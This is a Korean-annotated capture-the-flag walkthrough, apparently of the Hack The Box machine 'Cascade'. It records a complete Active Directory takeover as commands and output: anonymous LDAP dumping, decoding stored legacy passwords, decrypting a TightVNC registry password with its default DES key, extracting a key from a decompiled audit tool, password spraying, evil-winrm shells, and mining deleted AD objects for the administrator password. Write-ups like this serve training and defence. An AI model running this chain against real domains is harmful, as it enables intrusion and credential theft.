Proof of Concept
10.129.2.120
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknownInformation Gathering
hosts 정보 수집
┌──(kali㉿kali)-[~/Cascade]
└─$ nxc smb 10.129.2.120 --generate-hosts-file hosts
SMB 10.129.2.120 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Cascade]
└─$ cat hosts
10.129.2.120 CASC-DC1.cascade.local cascade.local CASC-DC1/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Cascade]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.2.120 CASC-DC1.cascade.local cascade.local CASC-DC1Initial Access
Anonymous로 LDAP 접속 가능
┌──(kali㉿kali)-[~/Cascade]
└─$ ldapsearch -x -H ldap://10.129.2.120 -D '' -w '' -b "DC=cascade,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=cascade,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# cascade.local
dn: DC=cascade,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=cascade,DC=local
instanceType: 5
whenCreated: 20200109153132.0Z
whenChanged: 20260224151604.0Z
subRefs: DC=ForestDnsZones,DC=cascade,DC=local
subRefs: DC=DomainDnsZones,DC=cascade,DC=local
subRefs: CN=Configuration,DC=cascade,DC=local
uSNCreated: 4099
uSNChanged: 344149
name: cascade
objectGUID:: BEPTb7rgSEuSvojkxZJmOA==
creationTime: 134164197644212350
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -9223372036854775808
minPwdAge: 0
<SNIP>LDAP 조회 결과 Base64로 인코딩된 비밀번호 발견
- clk0bjVldmE=
┌──(kali㉿kali)-[~/Cascade]
└─$ ldapsearch -x -H ldap://10.129.2.120 -D '' -w '' -b "DC=cascade,DC=local" | grep -i pwd
maxPwdAge: -9223372036854775808
minPwdAge: 0
minPwdLength: 5
pwdProperties: 0
pwdHistoryLength: 0
badPwdCount: 0
pwdLastSet: 0
maxPwdAge: -37108517437440
minPwdAge: 0
minPwdLength: 0
pwdProperties: 0
pwdHistoryLength: 0
badPwdCount: 0
pwdLastSet: 134164197918616832
badPwdCount: 0
pwdLastSet: 132230603002172876
badPwdCount: 0
pwdLastSet: 132247150854857364
badPwdCount: 0
pwdLastSet: 132230718862636251
cascadeLegacyPwd: clk0bjVldmE=
<SNIP>해당 비밀번호를 사용하는 계정 확인
┌──(kali㉿kali)-[~/Cascade]
└─$ ldapsearch -x -H ldap://10.129.2.120 -D '' -w '' -b "DC=cascade,DC=local" | grep -i cascadeLegacyPwd -B10
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=인코딩된 비밀번호를 디코딩하여 평문 비밀번호 획득
- rY4n5eva
┌──(kali㉿kali)-[~/Cascade]
└─$ echo -n 'clk0bjVldmE=' | base64 -d
rY4n5eva알아낸 r.thompson 사용자 계정정보로 SMB 인증 성공
┌──(kali㉿kali)-[~/Cascade]
└─$ nxc smb cascade.local -u 'r.thompson' -p 'rY4n5eva'
SMB 10.129.2.120 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.2.120 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5evar.thompson 사용자로 SMB 디렉토리 열거 결과 Data 공유 디렉토리에 읽기 권한을 보유하고 있음
┌──(kali㉿kali)-[~/Cascade]
└─$ nxc smb 10.129.2.120 -u 'r.thompson' -p 'rY4n5eva' --shares --timeout 60
SMB 10.129.2.120 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.2.120 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.129.2.120 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.2.120 445 CASC-DC1 Share Permissions Remark
SMB 10.129.2.120 445 CASC-DC1 ----- ----------- ------
SMB 10.129.2.120 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.2.120 445 CASC-DC1 Audit$
SMB 10.129.2.120 445 CASC-DC1 C$ Default share
SMB 10.129.2.120 445 CASC-DC1 Data READ
SMB 10.129.2.120 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.2.120 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.2.120 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.2.120 445 CASC-DC1 SYSVOL READ Logon server shareData 공유 디렉토리 접속
┌──(kali㉿kali)-[~/Cascade]
└─$ smbclient //cascade.local/Data/ -U 'r.thompson'
Password for [WORKGROUP\r.thompson]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jan 26 22:27:34 2020
.. D 0 Sun Jan 26 22:27:34 2020
Contractors D 0 Sun Jan 12 20:45:11 2020
Finance D 0 Sun Jan 12 20:45:06 2020
IT D 0 Tue Jan 28 13:04:51 2020
Production D 0 Sun Jan 12 20:45:18 2020
Temps D 0 Sun Jan 12 20:45:15 2020
6553343 blocks of size 4096. 1626893 blocks available\IT\Temp\s.smith 디렉토리에서 “VNC Install.reg” 발견
smb: \> cd IT
smb: \IT\> dir
. D 0 Tue Jan 28 13:04:51 2020
.. D 0 Tue Jan 28 13:04:51 2020
Email Archives D 0 Tue Jan 28 13:00:30 2020
LogonAudit D 0 Tue Jan 28 13:04:40 2020
Logs D 0 Tue Jan 28 19:53:04 2020
Temp D 0 Tue Jan 28 17:06:59 2020
smb: \IT\> cd Temp
smb: \IT\Temp\> dir
. D 0 Tue Jan 28 17:06:59 2020
.. D 0 Tue Jan 28 17:06:59 2020
r.thompson D 0 Tue Jan 28 17:06:53 2020
s.smith D 0 Tue Jan 28 15:00:01 2020
6553343 blocks of size 4096. 1627151 blocks available
smb: \IT\Temp\> cd s.smith
smb: \IT\Temp\s.smith\> dir
. D 0 Tue Jan 28 15:00:01 2020
.. D 0 Tue Jan 28 15:00:01 2020
VNC Install.reg A 2680 Tue Jan 28 14:27:44 2020
6553343 blocks of size 4096. 1627151 blocks available
smb: \IT\Temp\s.smith\> get "VNC Install.reg"
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (1.5 KiloBytes/sec) (average 1.9 KiloBytes/sec)“VNC Install.reg” 파일에서 비밀번호 Hex 값(6b,cf,2a,4b,6e,5a,ca,0f)을 발견
┌──(kali㉿kali)-[~/Cascade]
└─$ cat VNC\ Install.reg
��Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
<SNIP>Decrypted password using a default encryption key and got s.smith user’s plain password
- s.smith:sT333ve2
┌──(kali㉿kali)-[~/Cascade]
└─$ echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d -provider legacy -provider default | hexdump -Cv
00000000 73 54 33 33 33 76 65 32 |sT333ve2|s.smith 계정으로 WinRM 접속
┌──(kali㉿kali)-[~/Cascade]
└─$ evil-winrm -i cascade.local -u 's.smith' -p 'sT333ve2'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents>Read user.txt
*Evil-WinRM* PS C:\Users\s.smith\Desktop> type user.txt
49be0236b6a52d4a24ea31f6ea48a862
*Evil-WinRM* PS C:\Users\s.smith\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 4:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::9079:58d1:e378:4e86
Link-local IPv6 Address . . . . . : fe80::9079:58d1:e378:4e86%15
IPv4 Address. . . . . . . . . . . : 10.129.2.120
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%15
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htbLateral Movement (auth as arksvc)
s.smith 사용자 계정으로 Audit$ 공유 디렉토리 접근 가능
┌──(kali㉿kali)-[~/Cascade]
└─$ nxc smb 10.129.2.120 -u 's.smith' -p 'sT333ve2' --shares --timeout 60
SMB 10.129.2.120 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.2.120 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2
SMB 10.129.2.120 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.2.120 445 CASC-DC1 Share Permissions Remark
SMB 10.129.2.120 445 CASC-DC1 ----- ----------- ------
SMB 10.129.2.120 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.2.120 445 CASC-DC1 Audit$ READ
SMB 10.129.2.120 445 CASC-DC1 C$ Default share
SMB 10.129.2.120 445 CASC-DC1 Data READ
SMB 10.129.2.120 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.2.120 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.2.120 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.2.120 445 CASC-DC1 SYSVOL READ Logon server shareAudit$\DB 공유 디렉토리에서 CascAudit.exe, RunAudit.bat 파일 발견
┌──(kali㉿kali)-[~/Cascade]
└─$ smbclient //cascade.local/Audit$/ -U 's.smith%sT333ve2'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe An 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll An 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
cd
6553343 blocks of size 4096. 1619652 blocks available
smb: \> get CascAudit.exe
getting file \CascAudit.exe of size 13312 as CascAudit.exe (10.6 KiloBytes/sec) (average 10.6 KiloBytes/sec)
smb: \> get RunAudit.bat
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.0 KiloBytes/sec) (average 6.0 KiloBytes/sec)추가로 DB 공유 디렉토리에서 Audit.db 파일 발견
smb: \> cd DB
dirsmb: \DB\> dir
. D 0 Tue Jan 28 16:40:59 2020
.. D 0 Tue Jan 28 16:40:59 2020
Audit.db An 24576 Tue Jan 28 16:39:24 2020
6553343 blocks of size 4096. 1619653 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (20.0 KiloBytes/sec) (average 10.9 KiloBytes/sec)Audit.db 파일은 SQLite DB 파일이며, DB 내 Ldap 테이블에서 암호화된 ArkSvc 사용자 계정 정보 발견
- ArkSvc:BQO5l5Kj9MdErXx6Q6AGOw==
┌──(kali㉿kali)-[~/Cascade]
└─$ file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for 60RunAudit.bat 파일은 Audit.exe를 인자로 CascAudit.exe가 실행하는 것을 확인
┌──(kali㉿kali)-[~/Cascade]
└─$ cat RunAudit.bat
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db" dnSpy에서 CascAudit 파일 분석 결과 Audit.db 파일 내용을 이용하여 비밀번호 복호화를 수행하는 것을 확인하였으며, 이를 참고하여 암호화된 비밀번호를 복구
- w3lc0meFr31nd
sqliteConnection.Open();
using (SQLiteCommand sqliteCommand = new SQLiteCommand("SELECT * FROM LDAP", sqliteConnection))
{
using (SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader())
{
sqliteDataReader.Read();
str = Conversions.ToString(sqliteDataReader["Uname"]);
str2 = Conversions.ToString(sqliteDataReader["Domain"]);
string text = Conversions.ToString(sqliteDataReader["Pwd"]);
try
{
password = Crypto.DecryptString(text, "c4scadek3y654321");
}
catch (Exception ex)
{
Console.WriteLine("Error decrypting password: " + ex.Message);
return;
}
}
}
sqliteConnection.Close();AD 사용자 추출
┌──(kali㉿kali)-[~/Cascade]
└─$ impacket-GetADUsers -all 'cascade.local/s.smith:sT333ve2' -dc-ip 10.129.2.120
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Querying 10.129.2.120 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
administrator 2020-03-23 04:39:41.663064 2026-02-24 10:17:26.985883
CascGuest <never> <never>
krbtgt 2020-01-09 10:32:15.845632 <never>
arksvc 2020-01-09 11:18:20.217288 2020-01-29 16:05:40.988784
s.smith 2020-01-28 14:58:05.485736 2020-01-28 18:26:39.084234
r.thompson 2020-01-09 14:31:26.263625 2026-02-24 10:52:15.907552
util 2020-01-12 21:07:11.195585 2020-01-28 13:09:47.107123
j.wakefield 2020-01-09 15:34:44.415012 <never>
s.hickson 2020-01-12 20:24:27.800396 <never>
j.goodhand 2020-01-12 20:40:26.032079 <never>
a.turnbull 2020-01-12 20:43:13.357973 <never>
e.crowe 2020-01-12 22:45:02.166946 <never>
b.hanson 2020-01-13 11:35:39.153866 <never>
d.burman 2020-01-13 11:36:12.959125 <never>
BackupSvc 2020-01-13 11:37:03.191213 <never>
j.allen 2020-01-13 12:23:59.916560 <never>
i.croft 2020-01-15 16:46:21.865201 <never>Password Spray 수행 결과 arksvc 사용자로 인증 성공
- arksvc:w3lc0meFr31nd
┌──(kali㉿kali)-[~/Cascade]
└─$ nxc smb cascade.local -u userlist.txt -p 'w3lc0meFr31nd' --timeout 60
SMB 10.129.2.120 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.2.120 445 CASC-DC1 [-] cascade.local\administrator:w3lc0meFr31nd STATUS_LOGON_FAILURE
SMB 10.129.2.120 445 CASC-DC1 [-] cascade.local\CascGuest:w3lc0meFr31nd STATUS_LOGON_FAILURE
SMB 10.129.2.120 445 CASC-DC1 [-] cascade.local\krbtgt:w3lc0meFr31nd STATUS_LOGON_FAILURE
SMB 10.129.2.120 445 CASC-DC1 [+] cascade.local\arksvc:w3lc0meFr31ndarksvc 사용자로 WinRM 접속
┌──(kali㉿kali)-[~/Cascade]
└─$ evil-winrm -i cascade.local -u 'arksvc' -p 'w3lc0meFr31nd'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents>Privilege Escalation
arksvc 사용자가 “AD Recycle Bin” 그룹에 속한 것을 확인
*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin Alias S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled삭제된 객체 정보에서 비밀번호 발견
- YmFDVDNyMWFOMDBkbGVz
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
<SNIP>
CN : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
Created : 1/26/2020 2:34:31 AM
createTimeStamp : 1/26/2020 2:34:31 AM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
instanceType : 4
isDeleted : True
LastKnownParent : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Modified : 1/26/2020 2:40:52 AM
modifyTimeStamp : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN : User
Name : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : container
ObjectGUID : 746385f2-e3a0-4252-b83a-5a206da0ed88
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196700
uSNCreated : 196690
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:31 AM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
<SNIP>Base64로 디코딩
┌──(kali㉿kali)-[~/Cascade]
└─$ echo -n 'YmFDVDNyMWFOMDBkbGVz' | base64 -d
baCT3r1aN00dles획득한 비밀번호를 사용하여 Administrator로 WinRM 접속
┌──(kali㉿kali)-[~/Cascade]
└─$ evil-winrm -i cascade.local -u 'administrator' -p 'baCT3r1aN00dles'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
293d219c70dfd7c5c6eef11d11ecbd50
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 4:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::9079:58d1:e378:4e86
Link-local IPv6 Address . . . . . : fe80::9079:58d1:e378:4e86%15
IPv4 Address. . . . . . . . . . . : 10.129.2.120
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%15
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb